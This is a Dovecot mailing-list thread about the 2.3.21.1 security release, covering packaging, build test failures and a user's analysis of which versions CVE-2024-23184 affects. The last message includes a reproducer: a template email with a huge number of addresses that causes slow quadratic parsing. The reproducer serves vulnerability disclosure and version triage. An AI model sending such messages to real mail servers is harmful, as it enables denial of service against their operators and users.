Re: Dovecot v2.3.21.1 released
On 15/08/24 00:07, Marc via dovecot via dovecot wrote: we are releasing a CVE patch release 2.3.21.1. https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig Binary packages in https://repo.dovecot.org/ Docker images in https://hub.docker.com/r/dovecot/dovecot I know about these issues with openssl 3 and if I remember correctly this is solved in 2.4. But when do you expect packages for el9 to be available? El9 packages are in GhettoForge: http://ghettoforge.org/ 2.3.21.1 is being built now and will hopefully be released in a couple of hours. Peter ___ dovecot mailing list -- dovecot@dovecot.org To unsubscribe send an email to dovecot-le...@dovecot.org
Re: Dovecot v2.3.21.1 released
On 14/08/24 23:25, Aki Tuomi via dovecot wrote: Hi all, we are releasing a CVE patch release 2.3.21.1. https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig Binary packages in https://repo.dovecot.org/ Docker images in https://hub.docker.com/r/dovecot/dovecot Tests failing when attempting to build for both EL8 and 9: test-failures.c:152: Assert failed: internal_line_match(line, long_log_prefix, TEXT128) test-failures.c:152: Assert failed: internal_line_match(line, long_log_prefix, TEXT128) test-failures.c:152: Assert failed: internal_line_match(line, long_log_prefix, TEXT128) ...this test did not fail in 2.3.21 Peter ___ dovecot mailing list -- dovecot@dovecot.org To unsubscribe send an email to dovecot-le...@dovecot.org
RE: Dovecot v2.3.21.1 released
> On 14/08/24 23:25, Aki Tuomi via dovecot wrote: > > Hi all, > > > > we are releasing a CVE patch release 2.3.21.1. > > > > https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz > > https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig > > Binary packages in https://repo.dovecot.org/ > > Docker images in https://hub.docker.com/r/dovecot/dovecot > > Tests failing when attempting to build for both EL8 and 9: > When is 2.4 for el9 expected? ___ dovecot mailing list -- dovecot@dovecot.org To unsubscribe send an email to dovecot-le...@dovecot.org
Re: Dovecot v2.3.21.1 released
On 7/09/24 00:55, Marc via dovecot wrote: On 14/08/24 23:25, Aki Tuomi via dovecot wrote: Hi all, we are releasing a CVE patch release 2.3.21.1. https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig Binary packages in https://repo.dovecot.org/ Docker images in https://hub.docker.com/r/dovecot/dovecot Tests failing when attempting to build for both EL8 and 9: When is 2.4 for el9 expected? GhettoForge will release it after the general availablility of 2.4. Others from Dovecot have stated that it will be available directly from the dovecot ce repos once 2.4 is released. Peter ___ dovecot mailing list -- dovecot@dovecot.org To unsubscribe send an email to dovecot-le...@dovecot.org
Re: Dovecot v2.3.21.1 released
On 2. Sep 2024, at 15.44, Guilhem Moulin via dovecot wrote: > > Hi Aki, > >> we are releasing a CVE patch release 2.3.21.1. > > Your message to the oss-security list [0] says both 2.2 and 2.3 versions > are vulnerable to CVE-2024-23184. Using the following test message as > reproducer > >From: f...@example.net >To: b...@example.net > , b...@example.net > […] > , bar$n...@example.net >Bcc: b...@example.net >[…] >Bcc: baz$n...@example.net >Date: $(LC_TIME=C.UTF-8 date -R) >Subject: boom >Message-Id: $(cat /proc/sys/kernel/random/uuid)@example.net > >boom > > I could reproduce the issue back to 2.3.10 but not with earlier > versions. I used `doveadm fetch imap.envelope all` to measure the > (non-cached) IMAP ENVELOPE command. > > For n=100k, it takes ~20s with 2.3.19 vs. ~0.5s with early 2.3.x and > 2.2.x. For n=500k, I measured ~2s with early 2.3.x and 2.2.x, so for > these versions it doesn't look like parsing is O(n²) in the number of > addresses. > > I didn't try to bisect to pinpoint the exact commit, but AFAICT the main > problem you described > > | each header line's address is added to the end of a linked list. This > | is done by walking the whole linked list, which becomes more inefficient > | the more addresses there are. > > was introduced in 2.3.10 by > https://github.com/dovecot/core/commit/469fcd3bdd7df40bb8f4d131121f3bfbceade02a > . > > Is my reproducer/analysis incorrect, or are versions before 2.3.10 > immune to CVE-2024-23184? (AFAICT they are affected by CVE-2024-23185; > only talking about -23184 here.) Yes, looks like this is all correct. I guess we didn't really verify the oldest version this affects. ___ dovecot mailing list -- dovecot@dovecot.org To unsubscribe send an email to dovecot-le...@dovecot.org
